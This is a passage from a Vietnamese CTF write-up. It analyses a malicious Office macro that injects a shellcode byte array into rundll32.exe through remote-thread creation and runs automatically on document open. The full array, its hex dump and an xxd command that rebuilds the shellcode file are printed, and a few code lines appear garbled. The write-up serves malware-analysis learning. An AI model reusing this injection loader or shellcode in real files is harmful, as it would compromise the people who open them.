myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98,49,123,24,3,123,24,-125,-61,36,-76,-73,-126,-52,-70,56,123,12,-37,-79,-98,61,-37,-90,-21,109,-21,-83,-66,-127,-128,-32,42,18,-28,44,92,-109,67,11,83,36,-1,111,-14,-90,2,-68,-44,-105,-52,-79,21,-48,49,59,71,-119,62,-18,120,-66,11,51,-14,-116,-102,51,-25,68,-100,18,-74,-33,-57,-76,56,12,124,-3,34,81,-71,-73,-39,-95,53,70,8,-8,-74,-27,117,53,69,-9,-78,-15,-74,-126,-54,2,74,-107,8,121,-112,16,-117,-39,83,-126,119,-40,-80,85,-13,-42,125,17,91,-6,-128,-10,-41,6,8,-7,55,-113,74,-34,-109,-44,9,127,-123,-80,-4,-128,-43,27,-96,36,-99,-79,-75,84,-4,-35,122,85,-1,29,21,-18,-116,47,-70,68,27,3,51,67,-36,100,110,51,114,-101,-111,68,90,95,-59,20,-12,118,102,-1,4,119,-77,80,85,-41,108,17,5,-105,-36,-7,79,24,2,25,112,-13,43,50,-88,-5,83,-61,-46,-115,58,-81,49,21,-46,66,43,-68,66,-77,-59,81,-76,-125,77,-17,-79,116,94,-80,2,72,-22,17,-7,-58,33,-14,113,127,119,127,26,76,37,2,-38,-38,96,-44,-18,-102,-116,-15,-124,-37,110,-109,-112,-117,-26,97,-91,42,76,-20,67,70,-94,-72,-36,-1,91,-31,-105,-98,-92,60,-46,-95,47,-76,34,111,-40,-67,48,-104,-65,61,-55,89,42,61,-93,93,-4,106,91,92,-39,92,-60,-97,12,-33,3,95,-47,-23,120,86,71,85,23,-105,-121,85,-25,-63,-51,85,-113,-75,-75,6,-86,-71,99,59,103,44,-116,109,-37,-25,-28,-109,2,-49,-86,108,97,83,-84,-110,-9,124,21,-6,7,61,-91,-6,109,-67,-11,-110,122,-110,-6,82,-126,57,83,-6,9,-84,17,-101,14,-27,-12,5,14,10,45,-74,117,95,-46,55,-118,-119,-73,56,-118,-75,-55,5,92,-116,-65,72,92,-85,-80,-1,-63,-102,90,-1,86,-36,78)
If Len(Environ("ProgramW6432") >) 0 Then
sProc = Environ("windir") & "\\SysWOW64hr(92)\\rundll32Chr(46)exe"
Else
sProc = Environ("windir") & "\\System32hr(92)\\rundll32.exe"
End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfohProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_OpenEnd Sub
Sub Workbook_Open()
Auto_Open
End Sub
```
Đoạn mã này có vẻ đang cố gắng thực thi một luồng từ xa trong một tiến trình khác (cụ thể là rundll32.exe) bằng cách sao chép dữ liệu từ myArray (sử dụng các hàm như WriteStuff và CreateStuff) vào phần bộ nhớ của tiến trình đích và sau đó chạy luồng từ xa từ đó. Vậy kết luận thứ mà mình cần khai thác từ bước này chính là myArray.
Vì mảng này có số âm nên mình bỏ qua suy đoán chuyển các phần tử trong mảng về kí tự như những bài trước đó. Ở đây myArray có thể là shell code bởi vì nó được copy vào một tiến trình khác, đúng với mục đích của shell code. Giờ mình sẽ chuyển nó về hex với dạng file.sc
Chuyển sang hex khá dễ nên mình skip chỗ này, các bạn viết script python hay dùng tool đều được, sau cho ra được đoạn hex như này.
```dd c1 bf 20 56 42 7e d9 74 24 f4 5b 31 c9 b1 62 31 7b 18 03 7b 18 83 c3
24 b4 b7 82 cc ba 38 7b 0c db b1 9e 3d db a6 eb 6d eb ad be 81 80 e0 2a
12 e4 2c 5c 93 43 0b 53 24 ff 6f f2 a6 02 bc d4 97 cc b1 15 d0 31 3b 47
89 3e ee 78 be 0b 33 f2 8c 9a 33 e7 44 9c 12 b6 df c7 b4 38 0c 7c fd 22
51 b9 b7 d9 a1 35 46 08 f8 b6 e5 75 35 45 f7 b2 f1 b6 82 ca 02 4a 95 08
79 90 10 8b d9 53 82 77 d8 b0 55 f3 d6 7d 11 5b fa 80 f6 d7 06 08 f9 37
8f 4a de 93 d4 09 7f 85 b0 fc 80 d5 1b a0 24 9d b1 b5 54 fc dd 7a 55 ff
1d 15 ee 8c 2f ba 44 1b 03 33 43 dc 64 6e 33 72 9b 91 44 5a 5f c5 14 f4
76 66 ff 04 77 b3 50 55 d7 6c 11 05 97 dc f9 4f 18 02 19 70 f3 2b 32 a8
fb 53 c3 d2 8d 3a af 31 15 d2 42 2b bc 42 b3 c5 51 b4 83 4d ef b1 74 5e
b0 02 48 ea 11 f9 c6 21 f2 71 7f 77 7f 1a 4c 25 02 da da 60 d4 ee 9a 8c
f1 84 db 6e 93 90 8b e6 61 a5 2a 4c ec 43 46 a2 b8 dc ff 5b e1 97 9e a4
3c d2 a1 2f b4 22 6f d8 bd 30 98 bf 3d c9 59 2a 3d a3 5d fc 6a 5b 5c d9
5c c4 9f 0c df 03 5f d1 e9 78 56 47 55 17 97 87 55 e7 c1 cd 55 8f b5 b5
06 aa b9 63 3b 67 2c 8c 6d db e7 e4 93 02 cf aa 6c 61 53 ac 92 f7 7c 15
fa 07 3d a5 fa 6d bd f5 92 7a 92 fa 52 82 39 53 fa 09 ac 11 9b 0e e5 f4
05 0e 0a 2d b6 75 5f d2 37 8a 89 b7 38 8a b5 c9 05 5c 8c bf 48 5c ab b0
ff c1 9a 5a ff 56 dc 4e
```
Dùng xxd với chế độ chuyển đổi hexdump ngược
```echo "dd c1 bf 20 56 42 7e d9 74 24 f4 5b 31 c9 b1 62 31 7b 18 03 7b 18 83 c3
24 b4 b7 82 cc ba 38 7b 0c db b1 9e 3d db a6 eb 6d eb ad be 81 80 e0 2a
12 e4 2c 5c 93 43 0b 53 24 ff 6f f2 a6 02 bc d4 97 cc b1 15 d0 31 3b 47
89 3e ee 78 be 0b 33 f2 8c 9a 33 e7 44 9c 12 b6 df c7 b4 38 0c 7c fd 22
51 b9 b7 d9 a1 35 46 08 f8 b6 e5 75 35 45 f7 b2 f1 b6 82 ca 02 4a 95 08
79 90 10 8b d9 53 82 77 d8 b0 55 f3 d6 7d 11 5b fa 80 f6 d7 06 08 f9 37
8f 4a de 93 d4 09 7f 85 b0 fc 80 d5 1b a0 24 9d b1 b5 54 fc dd 7a 55 ff
1d 15 ee 8c 2f ba 44 1b 03 33 43 dc 64 6e 33 72 9b 91 44 5a 5f c5 14 f4
76 66 ff 04 77 b3 50 55 d7 6c 11 05 97 dc f9 4f 18 02 19 70 f3 2b 32 a8
fb 53 c3 d2 8d 3a af 31 15 d2 42 2b bc 42 b3 c5 51 b4 83 4d ef b1 74 5e
b0 02 48 ea 11 f9 c6 21 f2 71 7f 77 7f 1a 4c 25 02 da da 60 d4 ee 9a 8c
f1 84 db 6e 93 90 8b e6 61 a5 2a 4c ec 43 46 a2 b8 dc ff 5b e1 97 9e a4
3c d2 a1 2f b4 22 6f d8 bd 30 98 bf 3d c9 59 2a 3d a3 5d fc 6a 5b 5c d9
5c c4 9f 0c df 03 5f d1 e9 78 56 47 55 17 97 87 55 e7 c1 cd 55 8f b5 b5
06 aa b9 63 3b 67 2c 8c 6d db e7 e4 93 02 cf aa 6c 61 53 ac 92 f7 7c 15
fa 07 3d a5 fa 6d bd f5 92 7a 92 fa 52 82 39 53 fa 09 ac 11 9b 0e e5 f4
05 0e 0a 2d b6 75 5f d2 37 8a 89 b7 38 8a b5 c9 05 5c 8c bf 48 5c ab b0
ff c1 9a 5a ff 56 dc 4e" | xxd -r -p > out.sc
```
Tới bước này rồi thì mình sẽ dùng tool [SCDbg](http://sandsprite.com/blogs/index.php?uid=7&pid=152), tool này phân tích shellcode rất mạnh mẽ, trường hợp bài này mình sẽ xem hành vi của tệp out.sc phía trên.
Lúc này thì mình đã có được flag, bài này rate hard thì cũng không uổng,
Sign in with Wallet
Connect another wallet